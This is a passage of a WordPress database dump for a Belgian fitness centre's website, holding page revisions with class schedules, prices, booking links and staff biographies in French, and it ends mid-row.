(387, 1, '2014-02-09 20:36:22', '2014-02-09 20:36:22', '<table style=\"border: 1px; width: 100%;\">\n<tbody>\n<tr style=\"background-color: #ffffff;\">\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\n<div class=\"sousmenu\">\n<div align=\"center\">\n\n<a title=\"Les séances – Namur\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\">Namur</a>\n\n</div>\n</div></td>\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\n<div class=\"sousmenuhoover\">\n<div align=\"center\">\n\nLimelette\n\n</div>\n</div></td>\n</tr>\n</tbody>\n</table>\n<h1>&nbsp;</h1>\n<h1>Team Training - Limelette :</h1>\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 3 types de séances décrites ci-dessous\n\n&nbsp;\n<table style=\"width: 100%;\">\n<tbody>\n<tr>\n<td class=\"ttitreh\">LUNDI</td>\n<td class=\"ttitreh\">MARDI</td>\n<td class=\"ttitreh\">MERCREDI</td>\n<td class=\"ttitreh\">JEUDI</td>\n</tr>\n<tr style=\"background-color: #fafafa;\">\n<td class=\"ttrx\"><b>18h</b>\nRenforcement musculaire</td>\n<td class=\"tcardio\"><b></b>18h\nCardio</td>\n<td class=\"trip\"><b>18h</b>\nCircuit training</td>\n<td class=\"ttrx\"><b>17h30</b>\nRenforcement musculaire</td>\n</tr>\n<tr style=\"background-color: #eeeeee;\">\n<td class=\"trip\"><b>18h45</b>\nCircuit training</td>\n<td class=\"ttrx\"><b>18h45</b>\nRenforcement musculaire</td>\n<td class=\"tcardio\"><b>18h45</b>\nCardio</td>\n<td class=\"trip\"><b>18h15</b>\nCircuit training</td>\n</tr>\n<tr style=\"background-color: #fafafa;\">\n<td class=\"tcardio\"><b>19h30</b>\nCardio</td>\n<td class=\"trip\"><b>19h30</b>\nCircuit training</td>\n<td class=\"ttrx\"><b>19h30</b>\nRenforcement musculaire</td>\n<td class=\"tcardio\"><b>19h</b>\nCardio</td>\n</tr>\n</tbody>\n</table>\n<span style=\"text-decoration: underline; background: #A9F5F2;\"><strong>Cardio</strong></span>: Circuit permettant de développer votre endurance musculaire et cardiovasculaire! Idéal pour brûler un maximum de calories et perdre du poids (conseillé avec un programme alimentaire)!\n\n<span style=\"text-decoration: underline; background: #A9F5A9;\"><strong>Circuit training</strong></span>: Travaillez de manière fun sur un circuit ultra-complet, accessible à tous et adapté à votre niveau! Relevez des challenges et augmentez votre confiance en vous!\n\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>Renforcement musculaire</strong></span>: Excellent circuit pour raffermir, muscler votre corps en profondeur avec ou sans prise de volume! Vous utiliserez entre autre le TRX suspension training (méthode d\'entrainement révolutionnaire basée sur le poids du corps), le Rip Trainer, le kettlebell...\n<h1>&nbsp;</h1>\n<h2>Réservation des séances :</h2>\nRéserver vos séances de Team Training en ligne : <a href=\"http://reservation.crosstrainingcenter.be\">http://reservation.crosstrainingcenter.be</a>\n<h1>&nbsp;</h1>\n<h2>Duo Training - Limelette :</h2>\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\nEntrainements à deux personnes sous la supervision d’un coach.\n<h1>&nbsp;</h1>\n<h2>Personal Training - Limelette :</h2>\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\nUn coach par personne, l’idéal pour progresser plus rapidement!\n<h1>&nbsp;</h1>\n<h2>Coaching nutritionnel - Limelette :</h2>\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\nRendez-vous avec une diététicienne pour améliorer votre santé.\n<h1>&nbsp;</h1>\n<h2>Prix</h2>\n<table>\n<tbody>\n<tr>\n<td class=\"ttitrehprix\">Team Training</td>\n<td class=\"tcelluleprix\">1 séance : 9.00€\n1 carte de 10 séances : 80.00€ (valable 3 mois)\n1 carte de 20 séances : 120.00€ (valable 4 mois)\nAbonnement 6 mois illimité : 399.00€</td>\n</tr>\n<tr>\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\n</tr>\n<tr>\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\nSuivi 15,00€</td>\n</tr>\n</tbody>\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', '361-autosave-v1', '', '', '2014-02-09 20:36:22', '2014-02-09 20:36:22', '', 361, 'http://www.crosstrainingcenter.be/361-autosave-v1/', 0, 'revision', '', 0),
(388, 1, '2013-11-04 18:04:37', '2013-11-04 18:04:37', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1>&nbsp;</h1>\r\n<h1>Team Training - Limelette :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b></b>18h\r\nCardio</td>\r\n<td class=\"trip\"><b>18h</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nRenforcement musculaire</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"trip\"><b>18h45</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>18h45</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>18h45</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nCircuit training</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcardio\"><b>19h30</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>19h30</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCardio</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n<h1>&nbsp;</h1>\r\n<h2>Duo Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1>&nbsp;</h1>\r\n<h2>Personal Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1>&nbsp;</h1>\r\n<h2>Coaching nutritionnel - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1>&nbsp;</h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', '361-revision-v1', '', '', '2013-11-04 18:04:37', '2013-11-04 18:04:37', '', 361, 'http://www.crosstrainingcenter.be/361-revision-v1/', 0, 'revision', '', 0),
(390, 1, '2013-11-06 21:05:33', '2013-11-06 21:05:33', '', 'chloe_chmiel_pti', '', 'inherit', 'open', 'open', '', 'chloe_chmiel_pti', '', '', '2013-11-06 21:05:33', '2013-11-06 21:05:33', '', 20, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/chloe_chmiel_pti.jpg', 0, 'attachment', 'image/jpeg', 0),
(478, 1, '2015-04-21 09:37:57', '2015-04-21 09:37:57', '<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoach\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>LesMills Coach</li>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2015-04-21 09:37:57', '2015-04-21 09:37:57', '', 20, 'http://www.crosstrainingcenter.be/20-revision-v1/', 0, 'revision', '', 0),
(437, 1, '2014-02-17 18:01:07', '2014-02-17 18:01:07', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoach\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>LesMills Coach</li>\r\n        <li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n\r\n\r\n\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\"alignnone  wp-image-420\" alt=\"youssra_boujat_pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/youssra_boujat_pti.jpg\" width=\"108\" height=\"141\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Youssra Boujat</h2>\r\n<h5>Instructeur de Zumba Fitness</h5>\r\n<ul>\r\n	<li>Etudiante infirmière à l\'HENALLUX</li>\r\n	<li>Basketteuse au Belfius Namur Capital</li>\r\n	<li>Pratiquante de courses à pieds et de fitness</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\"alignnone size-full wp-image-390\" alt=\"chloe_chmiel_pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/chloe_chmiel_pti.jpg\" width=\"108\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Chloé Chmiel</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Master en kinésithérapie</li>\r\n	<li>Spécialisation en kinésithérapie sportive et thérapie manuelle</li>\r\n	<li>Kiné Nat.3 basket de Belgrade</li>\r\n	<li>Pratiquante de course à pied et danses sportives</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n&nbsp;\r\n</td>\r\n</tr>\r\n\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2014-02-17 18:01:07', '2014-02-17 18:01:07', '', 20, 'http://www.crosstrainingcenter.be/20-revision-v1/', 0, 'revision', '', 0),
(392, 1, '2013-11-06 21:07:33', '2013-11-06 21:07:33', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoach\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Fondateur GLFE consulting\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\"alignnone size-full wp-image-390\" alt=\"chloe_chmiel_pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/chloe_chmiel_pti.jpg\" width=\"108\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Chloé Chmiel</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Master en kinésithérapie</li>\r\n	<li>Spécialisation en kinésithérapie sportive et thérapie manuelle</li>\r\n	<li>Kiné Nat.3 basket de Belgrade</li>\r\n	<li>Pratiquante de course à pied et danses sportives</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Rogge</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Licence en Education Physique</li>\r\n	<li>Spécialisation en préparation physique et entrainement du sportif</li>\r\n	<li>Enseignante en éducation physique</li>\r\n	<li>Entraîneur de volley-ball</li>\r\n	<li>Pratiquant de volley-ball, natation et course à pied</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-11-06 21:07:33', '2013-11-06 21:07:33', '', 20, 'http://www.crosstrainingcenter.be/20-revision-v1/', 0, 'revision', '', 0),
(391, 1, '2013-11-06 21:06:21', '2013-11-06 21:06:21', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoach\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 